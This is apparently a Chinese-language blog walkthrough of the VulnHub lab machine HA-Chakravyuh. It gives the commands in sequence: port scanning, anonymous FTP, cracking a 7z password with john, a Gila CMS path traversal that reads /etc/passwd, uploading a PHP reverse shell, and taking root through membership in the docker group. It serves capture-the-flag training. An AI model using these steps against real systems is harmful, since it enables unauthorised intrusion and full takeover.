HA-Chakravyuh


环境

虚拟机平台:VMware Workstation Pro

攻击机:Kali(IP:192.168.253.136)

靶机:Chakravyuh(IP:192.168.253.148)

下载:https://www.vulnhub.com/entry/ha-chakravyuh,388/

Let’s go

nmap -p- -A 192.168.253.148

ftp 192.168.253.148 65530
anonymous
cd pub
get arjun.7z

查看发现需要密码,尝试暴力破解

python /usr/share/john/7z2john.py arjun.7z > passwd
john passwd

echo 'Z2lsYTphZG1pbkBnbWFpbC5jb206cHJpbmNlc2E=' | base64 -d

http://192.168.253.148/gila/

searchsploit gila
cat /usr/share/exploitdb/exploits/multiple/webapps/47407.txt

email:admin@gmail.com
password:princesa
http://192.168.253.148/gila/admin/fm/?f=src../../../../etc/passwd

上传PHP反弹shell,并且修改.htaccess文件为Allow from all,然后进行访问

http://192.168.253.148/gila/assets/php-reverse-shell.php

发现用户是docker组成员

python -c 'import pty; pty.spawn("/bin/bash")'
docker images
docker run -v /root:/getroot -it alpine


文章作者: DongHuangT1
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 DongHuangT1 !
评论
 上一篇
HA-Rudra HA-Rudra
虚拟机平台:VMware Workstation Pro
攻击机:Kali(IP:192.168.253.136)
靶机:Rudra(IP:192.168.253.149)
2020-02-23
下一篇 
Git Clone Git Clone
由于天朝网络原因,导致Git Clone异常缓慢,因此需要我们另辟途径进行加速。
2020-02-04
  目录